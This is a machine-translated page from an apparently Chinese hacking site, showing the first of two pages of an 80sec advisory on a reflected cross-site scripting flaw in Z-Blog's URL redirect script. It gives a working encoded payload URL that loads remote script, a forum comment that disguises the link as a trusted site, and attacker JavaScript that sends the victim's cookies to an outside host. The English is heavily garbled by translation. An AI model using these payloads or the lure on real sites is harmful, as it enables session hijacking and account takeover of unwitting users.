Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > crack analyzes > Content
Hot Articles
GE-Fanuc CIMPLICITY w32r
CA BrightStor ARCserve B
Apple iPhone Passcode Lo
Apple iPhone Passcode Lo
BitTorrent and uTorrent
FoosunCMS Sql Injection
KMail password encryptio
Rainbow awareness tool t
IE7 0Day crack analysis
Roams through three secu
Discuz! NT 2.5 pour into
Cracking the password pr
Ghost has the crack mirr
phpinfo cross station sc
Tomcat crack's analysis
Recommend Articles
Roams through three secu
FoosunCMS Sql Injection
In PHPCMS2.4 an interest
World browser local xss
Z-blog cross station scr
About XSS crack another
hzhost hypothesized main
php the escapeshellcmd m
Thunderclap ActiveX cont
360 security browser loc
The third party browser
The careful character re
Maxthon roams through br
Yahoo! Statistical funct
Using sohu website URL s
New Articles
The H?to half of all mal
Capital protects eyes cr
Agents of the secret net
fingerPIN launches multi
Tips to supply household
OCS Resolution Security
Spyware attacks tripled
Drink and drug driving c
Forgot your password?has
PKWARE PartnerLink membe
Masternaut provides live
Troj / Erazer-A Trojan i
Hacker of 21?Years old,
Free Firefox anti-phishi
Cyber-criminals are not
Z-blog cross station script attack crack
  Add date: 07/10/2008   Publishing date: 07/10/2008   Hits: 37
Total 2 pages, Current page:1, Jump to page:
 
Crack explanation: Z-Blog is one section based on Asp the platform Blog blog (net will) the procedure, supports Wap, supports browsers and so on Firefox, Oprea, is widespread in the domestic use, official main page in http://www.rainbowsoft.org/. Z- the blog code is rigorous, the onstage function is succinct, the backstage function is formidable, this brings the very big superiority safely for its product, but 80sec in the product discovered that a serious cross station script attack crack, in product design's some questions possibly bring the serious consequence in addition.

Crack manufacturer: http://www.rainbowsoft.org/

Crack analysis: In FUNCTION/c_urlredirect.asp, the procedure makes the following processing to the submission url parameter

strUrl=URLDecodeForAntiSpam (Request.QueryString (“url”))

And URLDecodeForAntiSpam is prevents trash connection the decoding function, its function processing is as follows

Function URLDecodeForAntiSpam(strUrl)

Dim i, s
For i =1 To Len(strUrl) Step 2
s=s & Mid(strUrl, i,1)
Next
URLDecodeForAntiSpam=s

End Function

After making like on will process the procedure to output the url parameter in c_urlredirect.asp


<meta http-equiv= " refresh " content= " 0; URL=<%Response.Write strUrl%> “/>

Will construct the url parameter to be able carefully to construct url type non-lasting xss to be as follows:

http://127.0.0.1/Z-Blog18/FUNCTION/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx%3Ax%22x%3Ex%3Cxsxcxrxixpxtx+xsxrxcx%3Dxhxtxtxpx%3Ax%2Fx%2Fx1 ×2×7x%2Ex0x%2Ex0x%2Ex1x%2Fx1x%2Exjxsx%3Ex%3Cx%2Fxsxcxrxixpxtx%3Ex

After above url visit, will introduce 127.0.0.1 /1.js execution, may write willfully the js code.

But z-blog all securities design use for to resist the onstage completely the attack, regarding the backstage basic any limit, the antispam function has not been similar in addition to the user submission's url connection to encryption processing, therefore very easy to be possible to entice others to visit above xss to attack url, may make the commentary to be as follows:

Looked that this station, has the new thing?
[URL= http://www.foo.com/function/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx%3Ax%22x%3Ex%3Cxsxcxrxixpxtx+xsxrxcx%3Dxhxtxtxpx%3Ax%2Fx%2Fx1x2x7x%2Ex0x%2Ex0x%2Ex1x%2Fx1x%2Exjxsx%3Ex%3Cx%2Fxsxcxrxixpxtx%3Ex] http://www.80sec.com [/URL]
The user saw what is http://www.80sec.com this trust stand, but once will click will carry out js which in www.foo.com territory the malicious user will assign, may write shell in this js, the increase user, will steal COOKIE then to simulate true change, the entire process will be very difficult to discover that the attack the intention, 80sec will provide js to be as follows:

xmlhttp=poster();
cookie=document.cookie;
login=cookie.indexOf ('password') ==-1? 0:1;
tolocation='http://www.80sec.com/';

//get cookie
x=new Image();
x.src= " http://www.80sec.com/c.php?c= " +escape (document.cookie);

 
Other pages: : 1 * 2 * Next>>
Prev:World browser local xss and so on window of cross territory crack POC Next:About XSS crack another attack tendency

Comment:

Category: Home > crack analyzes
Home